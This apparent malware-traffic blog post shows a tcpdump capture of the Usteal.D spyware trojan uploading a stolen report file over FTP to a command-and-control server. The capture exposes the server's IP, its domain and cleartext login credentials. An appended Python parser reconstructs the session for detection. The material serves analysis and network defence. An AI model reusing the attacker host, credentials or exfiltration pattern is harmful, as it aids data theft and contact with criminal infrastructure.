TrojanSpy:Win32/Usteal.D U Steal You Steal Spyware Trojan – Uses FTP to transfer your sensitive data out – Traffic Sample

By | June 19, 2015

TrojanSpy:Win32/Usteal.D is a dangerous trojan that collects sensitive information from its infected host and uses FTP to transfer the data to its command and control server. The traffic sample below is tcpdump output with packet payloads rendered as ASCII, covering the whole session: the DNS lookup of the server, the FTP login with cleartext credentials, the switch to passive mode and the upload of the stolen report file.

2013-03-07 06:57:38.635080 IP 10.0.2.15.1039 > 10.0.2.3.53: 18556+ A? jeck1072.ucoz[.]ru. (34)
E..>.7….”g

……5.*.;H|………..jeck1072.ucoz[.]ru…..
2013-03-07 06:57:38.665478 IP 10.0.2.3.53 > 10.0.2.15.1039: 18556 1/0/0 A 193.109.247.77 (50)
E..N….@.b.

….5…:..H|………..jeck1072.ucoz[.]ru………….8@…m.M
2013-03-07 06:57:38.942737 IP 10.0.2.15.1040 > 193.109.247.77.21: Flags [S], seq 3556468413, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0.8@…5.
….m.M……f…..p….w……….
2013-03-07 06:57:39.060840 IP 193.109.247.77.21 > 10.0.2.15.1040: Flags [S.], seq 10240001, ack 3556468414, win 8192, options [mss 1460], length 0
E..,….@….m.M
………@…f.`. .3…….
2013-03-07 06:57:39.061096 IP 10.0.2.15.1040 > 193.109.247.77.21: Flags [.], ack 1, win 65535, length 0
E..(.9@…5.
….m.M……f…@.P…k…
2013-03-07 06:57:39.181074 IP 193.109.247.77.21 > 10.0.2.15.1040: Flags [P.], seq 1:251, ack 1, win 8760, length 250
E..”….@….m.M
.........@...f.P."8....220---------- Welcome to Pure-FTPd ----------
220-You are user number 1 of 100 allowed.
220-Local time is now 14:57. Server port: 21.
220-This is a private system - No anonymous login
220 You will be disconnected after 15 minutes of inactivity.

2013-03-07 06:57:39.257397 IP 10.0.2.15.1040 > 193.109.247.77.21: Flags [P.], seq 1:17, ack 251, win 65285, length 16
E..8.:@…5.
….m.M……f…@.P…mb..USER 0jeck1072

2013-03-07 06:57:39.257958 IP 193.109.247.77.21 > 10.0.2.15.1040: Flags [.], ack 17, win 8760, length 0
E..(….@….m.M
………@…f.P.”8HK..
2013-03-07 06:57:39.372634 IP 193.109.247.77.21 > 10.0.2.15.1040: Flags [P.], seq 251:293, ack 17, win 8760, length 42
E..R….@….m.M
.........@...f.P."8.u..331 User 0jeck1072 OK. Password required

2013-03-07 06:57:39.373089 IP 10.0.2.15.1040 > 193.109.247.77.21: Flags [P.], seq 17:37, ack 293, win 65243, length 20
E..<.;@…5.
….m.M……f…A&P…bj..PASS q1w2e3r433590

2013-03-07 06:57:39.373303 IP 193.109.247.77.21 > 10.0.2.15.1040: Flags [.], ack 37, win 8760, length 0
E..(….@….m.M
………A&..f.P.”8H…
2013-03-07 06:57:41.483757 IP 193.109.247.77.21 > 10.0.2.15.1040: Flags [P.], seq 293:489, ack 37, win 8760, length 196
E…. ..@..).m.M
.........A&..f.P."8....230-User 0jeck1072 has group access to: 1002
230-OK. Current restricted directory is /
230-205 files used (0%) - authorized: 25600 files
230 2063 Kbytes used (0%) - authorized: 419840 Kb

2013-03-07 06:57:41.523577 IP 10.0.2.15.1040 > 193.109.247.77.21: Flags [P.], seq 37:62, ack 489, win 65047, length 25
E..A.<@…5.
….m.M……f…A.P…….MKD home/zxcvb/sdfhdrjf

2013-03-07 06:57:41.525790 IP 193.109.247.77.21 > 10.0.2.15.1040: Flags [.], ack 62, win 8760, length 0
E..(.
..@….m.M
………A…f.P.”8G0..
2013-03-07 06:57:42.440643 IP 193.109.247.77.21 > 10.0.2.15.1040: Flags [P.], seq 489:632, ack 62, win 8760, length 143
E…….@..\.m.M
.........A...f.P."8C}..550-Can't create directory: File exists
550-205 files used (0%) - authorized: 25600 files
550 2063 Kbytes used (0%) - authorized: 419840 Kb

2013-03-07 06:57:42.441111 IP 10.0.2.15.1040 > 193.109.247.77.21: Flags [P.], seq 62:87, ack 632, win 64904, length 25
E..A.=@…5.
….m.M……f…ByP…….CWD home/zxcvb/sdfhdrjf

2013-03-07 06:57:42.443788 IP 193.109.247.77.21 > 10.0.2.15.1040: Flags [.], ack 87, win 8760, length 0
E..(….@….m.M
………By..g.P.”8F…
2013-03-07 06:57:42.559307 IP 193.109.247.77.21 > 10.0.2.15.1040: Flags [P.], seq 632:683, ack 87, win 8760, length 51
E..[….@….m.M
.........By..g.P."8W...250 OK. Current directory is /home/zxcvb/sdfhdrjf

2013-03-07 06:57:42.752931 IP 10.0.2.15.1040 > 193.109.247.77.21: Flags [.], ack 683, win 64853, length 0
E..(.>@…5.
….m.M……g…B.P..Uk7..
2013-03-07 06:58:39.626385 IP 10.0.2.15.1040 > 193.109.247.77.21: Flags [P.], seq 87:95, ack 683, win 64853, length 8
E..0.?@…5.
….m.M……g…B.P..U.5..TYPE I

2013-03-07 06:58:39.626458 IP 193.109.247.77.21 > 10.0.2.15.1040: Flags [.], ack 95, win 8760, length 0
E..(….@….m.M
………B…g.P.”8FM..
2013-03-07 06:58:39.744427 IP 193.109.247.77.21 > 10.0.2.15.1040: Flags [P.], seq 683:713, ack 95, win 8760, length 30
E..F….@….m.M
.........B...g.P."8g...200 TYPE is now 8-bit binary

2013-03-07 06:58:39.873228 IP 10.0.2.15.1040 > 193.109.247.77.21: Flags [P.], seq 95:101, ack 713, win 64823, length 6
E….@@…5.
….m.M……g…B.P..7….PASV

2013-03-07 06:58:39.875848 IP 193.109.247.77.21 > 10.0.2.15.1040: Flags [.], ack 101, win 8760, length 0
E..(….@….m.M
………B…g”P.”8F)..
2013-03-07 06:58:39.991528 IP 193.109.247.77.21 > 10.0.2.15.1040: Flags [P.], seq 713:765, ack 101, win 8760, length 52
E..\….@….m.M
.........B...g"P."8.+..227 Entering Passive Mode (193,109,247,77,172,247)

2013-03-07 06:58:39.992035 IP 10.0.2.15.1041 > 193.109.247.77.44279: Flags [S], seq 503059361, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0.A@…5.
….m.M…………p……………
2013-03-07 06:58:40.110137 IP 193.109.247.77.44279 > 10.0.2.15.1041: Flags [S.], seq 18688001, ack 503059362, win 8192, options [mss 1460], length 0
E..,….@….m.M
………(…..`. ………
2013-03-07 06:58:40.110366 IP 10.0.2.15.1041 > 193.109.247.77.44279: Flags [.], ack 1, win 65535, length 0
E..(.B@…5.
….m.M……….(.P….D..
2013-03-07 06:58:40.110549 IP 10.0.2.15.1040 > 193.109.247.77.21: Flags [P.], seq 101:160, ack 765, win 64771, length 59
E..c.C@…5.
….m.M……g”..B.P…….STOR NO_PWDS_report_07-03-2013_05-57-03-4C33322F-IFLH.bin

2013-03-07 06:58:40.112781 IP 193.109.247.77.21 > 10.0.2.15.1040: Flags [.], ack 160, win 8760, length 0
E..(….@….m.M
………B…g]P.”8E…
2013-03-07 06:58:40.228677 IP 193.109.247.77.21 > 10.0.2.15.1040: Flags [P.], seq 765:795, ack 160, win 8760, length 30
E..F….@….m.M
.........B...g]P."8^...150 Accepted data connection

2013-03-07 06:58:40.288726 IP 10.0.2.15.1041 > 193.109.247.77.44279: Flags [.], seq 1:1461, ack 1, win 65535, length 1460
E….D@…0.
2013-03-07 06:58:40.288780 IP 193.109.247.77.44279 > 10.0.2.15.1041: Flags [.], ack 1461, win 8760, length 0
E..(….@….m.M
………(….VP.”8.X..
2013-03-07 06:58:40.289188 IP 10.0.2.15.1041 > 193.109.247.77.44279: Flags [P.], seq 1461:1737, ack 1, win 65535, length 276
E..<.E@…4.
….m.M…….V..(.P…-D…%.
P……..0/…..,o.\..v.*..b.*..V..1..!..2…………..Th.2/..kHs…..=….A@@……R&N..}..\….Te.PI..k.&’.;%$..e..E…n7l.X..B.?..g.s…h……g.w……qg8…..}9._.U..m..”..P…E..c0J. ….,..M..1.y…Z.7..u9…..’B.R….u..ta..R.R.;l…..!..`.[.`…..A..\.u.Nc./….
2013-03-07 06:58:40.289199 IP 193.109.247.77.44279 > 10.0.2.15.1041: Flags [.], ack 1737, win 8760, length 0
E..(….@….m.M
………(….jP.”8.D..
2013-03-07 06:58:40.364013 IP 10.0.2.15.1041 > 193.109.247.77.44279: Flags [F.], seq 1737, ack 1, win 65535, length 0
E..(.F@…5.
….m.M…….j..(.P….{..
2013-03-07 06:58:40.364052 IP 193.109.247.77.44279 > 10.0.2.15.1041: Flags [.], ack 1738, win 8760, length 0
E..(….@….m.M
………(….kP.”8.C..
2013-03-07 06:58:40.438388 IP 10.0.2.15.1040 > 193.109.247.77.21: Flags [.], ack 795, win 64741, length 0
E..(.G@…5.
….m.M……g]..C.P…j…
2013-03-07 06:58:40.481915 IP 193.109.247.77.44279 > 10.0.2.15.1041: Flags [F.], seq 1, ack 1738, win 8760, length 0
E..(….@….m.M
………(….kP.”8.B..
2013-03-07 06:58:40.482181 IP 193.109.247.77.21 > 10.0.2.15.1040: Flags [P.], seq 795:889, ack 160, win 8760, length 94
E…….@….m.M
.........C...g]P."8....226-File successfully transferred
226 0.266 seconds (measured here), 6.37 Kbytes per second

2013-03-07 06:58:40.482227 IP 10.0.2.15.1041 > 193.109.247.77.44279: Flags [.], ack 2, win 65535, length 0
E..(.H@…5.
….m.M…….k..(.P….z..
2013-03-07 06:58:40.483280 IP 10.0.2.15.1040 > 193.109.247.77.21: Flags [F.], seq 160, ack 889, win 64647, length 0
E..(.I@…5.
….m.M……g]..CzP…j…
2013-03-07 06:58:40.483330 IP 193.109.247.77.21 > 10.0.2.15.1040: Flags [.], ack 161, win 8760, length 0
E..(….@….m.M
………Cz..g^P.”8E=..
2013-03-07 06:58:40.601517 IP 193.109.247.77.21 > 10.0.2.15.1040: Flags [P.], seq 889:902, ack 161, win 8760, length 13
E..5….@….m.M
.........Cz..g^P."8{u..226 Logout.

2013-03-07 06:58:40.601573 IP 193.109.247.77.21 > 10.0.2.15.1040: Flags [F.], seq 902, ack 161, win 8760, length 0
E..(….@….m.M
………C…g^P.”8E/..
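As an added example (not part of the original post), a small Python parser that walks tcpdump ASCII output like the capture above, reconstructs the FTP control session to port 21, derives the passive-mode data port from the 227 reply (172 * 256 + 247 = 44279) and sums the bytes the client then pushed to that port. The SAMPLE lines are constructed from the capture above with non-printable bytes shown as dots; the function and field names are my own.

```python
import re
from collections import defaultdict
HDR = re.compile(r'^\S+ \S+ IP (\S+?)\.(\d+) > (\S+?)\.(\d+): Flags .*length (\d+)$')
CMD = re.compile(r'\b(USER|PASS|STOR)\b ?(.*)$')
PASV = re.compile(r'227 .*\((\d+),(\d+),(\d+),(\d+),(\d+),(\d+)\)')

def analyze(dump):
    """One finding per FTP control session (server port 21) in tcpdump -A text."""
    sessions = defaultdict(lambda: {"user": None, "cleartext_pass": False, "pasv": None,
                                    "stored": [], "bytes_out": 0})
    pasv_ports, key, to_server = {}, None, False   # (server_ip, data_port) -> session key
    for line in dump.splitlines():
        h = HDR.match(line)
        if h:                                        # TCP packet header: sets the context
            src, sport, dst, dport, length = h.groups()
            key = None
            if dport == "21":
                key, to_server = (src, dst), True
            elif sport == "21":
                key, to_server = (dst, src), False
            elif (dst, int(dport)) in pasv_ports:    # client -> passive data port
                sessions[pasv_ports[(dst, int(dport))]]["bytes_out"] += int(length)
        elif re.match(r'\d{4}-\d\d-\d\d ', line):    # other packet header (e.g. DNS)
            key = None
        elif key is not None and to_server:          # payload of a client command
            c = CMD.search(line)
            if c and c.group(1) == "USER":
                sessions[key]["user"] = c.group(2).strip()
            elif c and c.group(1) == "PASS":
                sessions[key]["cleartext_pass"] = True   # noted; the secret is never kept
            elif c and c.group(1) == "STOR":
                sessions[key]["stored"].append(c.group(2).strip())
        elif key is not None and (p := PASV.search(line)):   # server reply with data port
            o = [int(x) for x in p.groups()]
            sessions[key]["pasv"] = (".".join(map(str, o[:4])), o[4] * 256 + o[5])
            pasv_ports[sessions[key]["pasv"]] = key
    return [{"client": k[0], "server": k[1], **v} for k, v in sessions.items()]
# Constructed sample mirroring the capture above (tcpdump -A, non-printables as dots).
SAMPLE = """\
2013-03-07 06:57:39.257397 IP 10.0.2.15.1040 > 193.109.247.77.21: Flags [P.], seq 1:17, ack 251, win 65285, length 16
....m.M......f...@.P...mb..USER 0jeck1072
2013-03-07 06:57:39.373089 IP 10.0.2.15.1040 > 193.109.247.77.21: Flags [P.], seq 17:37, ack 293, win 65243, length 20
....m.M......f...A&P...bj..PASS q1w2e3r433590
2013-03-07 06:58:39.991528 IP 193.109.247.77.21 > 10.0.2.15.1040: Flags [P.], seq 713:765, ack 101, win 8760, length 52
.........B...g"P."8.+..227 Entering Passive Mode (193,109,247,77,172,247)
2013-03-07 06:58:40.110549 IP 10.0.2.15.1040 > 193.109.247.77.21: Flags [P.], seq 101:160, ack 765, win 64771, length 59
....m.M......g"..B.P.......STOR NO_PWDS_report_07-03-2013_05-57-03-4C33322F-IFLH.bin
2013-03-07 06:58:40.288726 IP 10.0.2.15.1041 > 193.109.247.77.44279: Flags [.], seq 1:1461, ack 1, win 65535, length 1460
2013-03-07 06:58:40.289188 IP 10.0.2.15.1041 > 193.109.247.77.44279: Flags [P.], seq 1461:1737, ack 1, win 65535, length 276
"""
```

Running `analyze(SAMPLE)` yields one finding for 10.0.2.15 -> 193.109.247.77: user 0jeck1072, a cleartext password, passive data port 44279 and 1736 bytes uploaded as the NO_PWDS_report file, which is the signal a network sensor would alert on.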
